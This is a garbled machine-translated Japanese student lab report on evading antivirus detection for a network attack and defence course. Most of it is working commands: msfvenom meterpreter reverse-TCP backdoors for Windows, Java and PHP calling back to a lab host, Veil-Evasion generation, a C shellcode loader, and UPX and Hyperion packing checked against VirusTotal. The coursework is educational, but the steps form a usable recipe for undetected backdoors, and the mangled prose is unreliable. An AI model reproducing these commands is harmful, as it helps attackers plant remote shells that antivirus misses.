20175333の曹操Yakun EXP3回避殺傷原則と実践に対する2019-2020-2ネットワーク技術
答え原則と基本的な質問を殺す無料
まず、殺すために自由の原則
一般的に、悪意のあるソフトウェアに対処することは、ウイルス対策ソフトウェアによって検出されないようにするに行わ。また、技術の浸透をテストする必要があります。
殺害を避けるために良い仕事をするために、それは明らかにアンチウイルスソフトウェア(マルウェア検出ツール)必要があり、それがどのように動作するかです。AV(アンチウイルス)が大きな産業です。基本的なマルウェアの作成経験を持つ主要な技術者の一つ。
そしてその逆、殺害を避けるためのツールやテクニックを理解するために、あなたはそれに対抗する基盤を持つことになります。
第二に、基本的な質問には答え
1.どのようにソフトに検出された悪意のあるコードを殺すために?
- シグネチャベースの検出:署名は、データの1つのまたは複数の期間である、多くの悪質なコードの分析の後、我々は、一つ以上のクラスコードに悪意のあるコードの断片しばしばであるがない他の通常の手順は、その署名を発見しました。あなたは悪質なコードと見なされた署名を含む単一の実行可能ファイルにソフト検出器を殺す場合。
- ヒューリスティックのマルウェアの検出:一部の一方的な特徴を推論することです。通常ので、正確な決意を基準の欠如。(不正確)
- 挙動ベースのマルウェア検出:ヒューリスティックは行動監視を接合するものとして理解することができます。悪意のあるコードの観察を通じて、我々はいくつかの行動ではなく、共通の悪意のあるコードの特別な行動、我々はこれらの特別な行動はマルウェアとみなされます発見した場合、プログラムを監視する実行キルソフトがあることがわかりました。(不正確)
殺すために自由に何2.?
行うための悪意のあるソフトウェアに対処するためにいくつかのテクニックを使用して、それがウイルス対策ソフトウェアによって検出されないようにしましょう。同時に、侵入テストを殺すためにも、自由に技術を使用する必要があります。
3.基本的な方法は何殺害を回避するには?
-
変更署名
- のみEXE--シェル(暗号化された圧縮されたシェルシェル)
- (Meterpreterのような)がありシェルコード - エンコードでエンコード
- ソースコード - 他の言語に再コンパイルリライト
-
変化挙動
- 通信
- リバウンド接続を使用してみてください
- トンネル技術を使用してください
- 暗号化された通信データ
- 動作モード
- RAMベースの操作
- システムの変更を削減
- コードの正常な機能の役割を混同しましょう
- 通信
-
型にはまらない方法
- MSFへの書き込みの攻撃コードとして、バックドアとして脆弱なアプリケーションを使用します。
- 社会階級の攻撃、AVソフトオフトリックの目標を使用してください。
- 悪意のあるソフトウェアを手作り
実験タスク
タスク1:ベール - 脱税、のようなjarファイルを生成し、他の文書などMSFエンコーダ、msfvenomの適切な使用、回避の殺害に独自のシェルコードのプログラミングツールやテクニックを使用
1.正しいMSFのエンコーダは、EXEファイルを生成します
-
バックドアのMSFの生成を使用して、第2の実験では、使用することができますVirusTotalまたはVirscanスキャンするバックドアを生成するために、両方のサイトを。
-
次のようにVirusTotalの結果をスキャンした後、次のとおりです。
-
サイトの名前が変更された後(デジタル誤差内のファイル名が発生した場合、名前を変更し、再試行をVirscanサイトを使用した場合)Virscanスキャン結果は次の通りです:
どんな治療裏口のないこのショーは、ほとんどのソフトキルで検出することができる、のは、数回に分けて、MSFエンコーダとバックドアをエンコードして検出することができます。
-
ペイロードの文字を削除する必要が、コマンドは-bで、-e選択エンコーダ:コマンドを使用してエンコード渡します
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.253.128 LPORT=5333 -f exe > II_backdoor.exe
-
実行可能ファイルの後VirusTotalスキャン結果にアップロードエンコード次のとおりです。
-
反復の-iセット番号:10は、コマンドを使用して符号化
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.253.128 LPORT=5333 -f exe > III_backdoor.exe
-
実行可能ファイルの後、次のようにVirusTotalのスキャン結果にアップロード10倍であるエンコード:
-
繰り返しコードする2つの理由から、殺すこと自由にあまり目に見える効果はありません:
- shikata_ga_nai常にexeファイルを結合する必要性の一部、ソフトキルはちょうどそれのこの部分を凝視(スタブデコーダ)がデコードされます。
- msfvenom exeファイルは、デフォルトパラメータまたはテンプレートは、ある一定の特性が存在する場合、それは、すべてのexeファイルを生成し、固定テンプレートを生成します。だから、一般的にはAVベンダーは一度、すべてのために悪質なコードを生成するすべてのmsfvenomを解決するように、それらの使用のための署名テンプレートを生成します。あなたが殺すためにmsfvenom自由を使用している場合、テンプレートのネイティブを使用する必要があります。
2. msfvenom生成されたjarファイル
-
コマンドを使用してJavaバックドアを生成します。
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.253.128 LPORT=5333 x> cyk_backdoor_java.jar
-
Makefileは次の通り:
-
次のようにスキャンの結果は以下のとおりです。
3. msfvenomは、PHPファイルを生成します
-
コマンドを使用してPHPバックドアを生成します。
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.253.128 LPORT=5333 x> 20175333_backdoor.php
-
Makefileは次の通り:
-
次のようにスキャンの結果は以下のとおりです。
4.ベール-脱税のバックドアの生成と検出
インストールベール:実験前には、ハードそのうち、実際に作ることができない、唯一のため息、インストールされています。背中に書かれた操作
-
インストールインタフェース:
-
と
use evasion
悪-回避を入力するためのコマンド
-
コマンドを入力し
use c/meterpreter/rev_tcp.py
、設定インターフェイスを入力します -
IP接続がリバウンドするように設定され、コマンドは次のとおりです。
set LHOST 192.168.253.128
ここで注目すべきは、IPはKaliIPです。 -
ポートを設定し、コマンドは次のとおりです。
set LPORT 5333
-
入力し
generate
、生成されたファイルを、あなたはのplayloadをしたい名前を入力します。veil_c_5333
-
パス保存、上記のように
/var/lib/veil/output/compiled/veil_c_5333.exe
-
試験結果:
半手動注入および実行シェルコード
-
まず、コマンドを使用します。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.253.128 LPORT=5333 -f c
期間シェルコードのC言語を生成します。
-
ファイルを作成し
cyk_veil.c
、その後、unsigned char buf[]
次のようにコードがあるに割り当てられています:
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
此处省略
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
int main()
{
int (*func)() = (int(*)())buf;
func();
}
-
コマンドを使用します。
i686-w64-mingw32-g++ cyk_veil.c -o cyk_veil.exe
実行可能ファイルに.cファイルをコンパイル。
-
試験結果:
-
あなたは殺害火口、Windows上でプログラムを実行するために使用したいときは:
6.てみパッカーはを通じて混乱にしよう
パッカーズは、実行可能プログラムのリソース圧縮の完全な名前である必要があり、圧縮されたプログラムを直接実行することができます。
パッカーは、バイナリプログラムで実行時の優先アクセス制御プログラムのコードの一部を移植する他の一般的な方法は、その後、元のコードに制御が戻った後、そうすることの目的は、実際のプログラムを非表示にすることですOEPの(エントリポイント、割れを防止するため)。ほとんどのウイルスは、この原理に基づいています。
プログラムは、元のプログラムのシェルおよびソフトウェアを保護するために元のプログラムの正常な動作を保証するために、外部プロシージャを破壊されない、パッカー自体コンパイル、解析又は動的な解析に外部プログラムまたはソフトウェアを防ぐために、パッカーを必要とします。
この技術はまた、亀裂にソフトウェアを防ぐために、ソフトウェアの著作権を保護するために使用されます。しかし、ウイルスのために、パッカーは、そのウイルスの侵入や破壊の一部としての機能の一部を有効にする、いくつかのアンチウイルススキャンソフトウェアをバイパスすることができます。
同様の方法を使用して、MSFエンコーダ、シェルコードの再エンコード。
-
圧縮されたシェルを使用して(UPX)
upx cyk_veil.exe -o cyk_upx.exe
また、シェルのcyk_veilに先立ち- 結果:
-
ハイペリオンの暗号化シェル
-
ファイルのコピーを生成する
/usr/share/windows-binaries/hyperion/
ディレクトリ -
ディレクトリを入力
/usr/share/windows-binaries/hyperion/
して -
コマンドを入力
wine hyperion.exe -v cyk_upx.exe cyk_upx_Hyperion.exe
パッカーを:
-
キリング結果:
-
タスク2:殺害を避けるために様々な技術を適用して、悪意のあるコードの組み合わせを達成するために
- 手インジェクションシェルコードによって+ +暗号シェルシェル圧縮:
タスク3:測定しても、コンピュータの名前の付いたソフトのバージョンを殺す、成功するためのソフトを殺すの場合には、別のコンピュータを使用して、実行バック
ホワイトリストに実行することはできませんではない、それが失敗しました。
3:実験の経験を
行うには、この実験では、殺害を避けるためです。明らかに行うために殺すこと自由に感じて下さい殺す1が殺傷1、少し不快なメンタリティを作る作る、ウイルス対策ソフトウェアも進行されている、非常に困難です。あなたが私を解くことができれば、私はそれが非常に困難な実験だと思う。この時、ブログが基準先輩であり、学生はプロセスで遭遇ブログ、問題を完了するために、実験を行っているが、ブログを見学生に、参照します問題は、ベールのインストールを車部門を警告した後、私は、学生がブログしていない場合、私はおそらく一日行い、夜に行うには正午から、午後を過ごしました
4:実験的な問題の
インストールのベール:
- STEP1:ベールをインストール
- STEP2:必須インストールが無効な場合は、使用するコマンドCDを/ usr / share /ベール/設定/フォルダに
- STEP3:コマンドのvim setup.sh編集にファイルを使用し、260ヤードクラウド・ウェアハウスにgithubのリポジトリの最初の行は、https://gitee.com/spears/VeilDependencies.git(通常は直接、非常に、非常に遅いアクセスgithubのに単語を変更しないでくださいエラー)
- STEP4:コマンドライン入力ベール、すべてデフォルトでインストール
- STEP5:それは物事をダウンロードして起動を参照してください。あなたは安心することができ
このブログ何も今日はないであろう彼なしで、大きな助けSXX学生をありがとう